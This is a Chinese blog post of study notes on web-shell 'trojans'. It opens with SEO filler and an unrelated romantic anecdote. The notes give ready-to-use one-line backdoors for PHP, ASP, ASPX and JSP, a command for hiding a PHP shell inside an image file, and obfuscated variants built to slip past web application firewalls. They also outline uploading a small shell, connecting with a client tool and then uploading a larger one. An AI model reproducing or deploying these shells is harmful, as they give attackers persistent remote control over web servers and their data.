龙空技术网

某教程学习笔记(一):13、脚本木马原理

之乎者也吧呀 154

前言:

如今各位老铁们对“一句话木马php原理”大体比较关注,同学们都需要剖析一些“一句话木马php原理”的相关知识。那么小编同时在网摘上汇集了一些关于“一句话木马php原理””的相关知识,希望朋友们能喜欢,朋友们一起来学习一下吧!

我和她说,如果有天你要离开我,你就跟我掰手腕,赢了你就让你走,她说我那么瘦小怎么会赢。后来她真的要和我分手,我把右手放在桌子上,眼看我要赢的时候,她把左手放到右手上,我抬头看她咬着牙眼里含着泪,我知道她真得要离开我了。。。

---- 网易云热评

一、一句话木马,隐蔽性强,功能强大,为上传大马做准备

1、php一句话

<?php @eval($_POST['aiyou']);?>

将一句话上传到服务器

用菜刀连接

读取数据库

终端运行命令

2、asp一句话

<% eval request("aiyou") %>

3、aspx一句话

<%@ Page Language="Jscript"%>

<%eval(Request.Item["value"],"unsafe");%>

4、jsp一句话

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

5、图片马

cmd下做一句话

copy /b1.jpg+1.php 2.jpg

C32ASM做一句话

二、一句话变形,waf会拦截一句话,可以通过变形绕过

<?php $_request['a']($_request['b']); ?>

<%eval(request(chr(112)))%>

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("aiyou"))%>

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&-"&"5"&")"&")")%>

<%a=request("aiyou")%><%eval a%>

三、大马,功能比小马的功能更加强大

上传小马后用菜刀连接,然后再通过菜刀上传大马

禁止非法,后果自负

欢迎关注公众号:web安全工具库

标签: #一句话木马php原理